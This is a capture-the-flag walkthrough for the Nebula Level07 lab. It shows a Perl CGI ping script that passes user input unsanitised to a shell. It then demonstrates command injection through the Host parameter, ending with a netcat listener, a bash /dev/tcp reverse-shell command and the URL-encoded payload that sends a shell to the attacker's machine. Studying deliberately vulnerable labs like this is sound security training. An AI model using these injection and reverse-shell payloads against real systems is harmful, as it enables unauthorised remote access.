Exploit-Exercice : Nebula
Level07 - Command injection
Here what we can find on exploit-exercice
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
They also provide the source code
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
$host = $_[0];
print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`;
foreach $line (@output) { print "$line"; }
print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
The weakness of this program is this line
@output = `ping -c 3 $host 2>&1`;
if we control the variable host we can inject command and get a shell
so let’s try to take “hack” this program
We can run the index.cgi with perl like this
the Host=localhost set the parameter to localhost
Let’s try to inject a command
You can see that this script is run as level07. This is not what we want, let’s read the thttpd.conf
This is interesting a server run on port 7007
Now I will show you a method to get a reverse shell
Web Browser attack
Open kali linux and go to http://nebula_ip:7007/index.cgi?Host=localhost
You will see the result of the ping in your web browser
Well if we run our command like this http://nebula_ip:7007/index.cgi?Host=localhost; id ? will it work ?
What ? no output of id command ?
So let’s try to encode the “;”
http://nebula_ip:7007/index.cgi?Host=localhost%3Bid
Yes ! the command are executed as flag07 ! But now I want a shell !
On my kali linux machine I run
nc -lvp 8888
To have a reverse shell you can run
bash -i >& /dev/tcp/kali_linux_ip/8888 0>&1
encode it and you will have
http://nebula_ip:7007/index.cgi?Host=localhost%3Bbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fkali_linux_ip%2F8888%200%3E%261
if we visit the link and wait
You get a shell ! Well done Hacker ! You’ll be ready for level08